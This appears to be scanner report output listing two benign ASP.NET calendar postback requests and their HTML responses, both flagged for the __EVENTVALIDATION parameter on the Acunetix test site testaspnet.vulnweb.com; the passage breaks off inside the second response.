URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8165&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAvQYYMtoIZGRk2Uje5FG2mDeDPuzsww7n9%2B31cQw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL129nKDgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPyVKjd35lCXzwSB2Rxapx7yomF3k%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:24:14 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAvQYYMtoIZGRk2Uje5FG2mDeDPuzsww7n9+31cQw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL129nKDgK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPyVKjd35lCXzwSB2Rxapx7yomF3k=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:White" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8581&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgAAlfL8eNsIZGRkClpT8E9mLxdFHJ9uhPt7Py8AmTU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL12fLDDwKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCvKfLAuCgDtBwR%2BpeX%2B%2FOzWjMF5D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:11:07 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgAAlfL8eNsIZGRkClpT8E9mLxdFHJ9uhPt7Py8AmTU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL12fLDDwKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCvKfLAuCgDtBwR+peX+/OzWjMF5D" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:White" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using 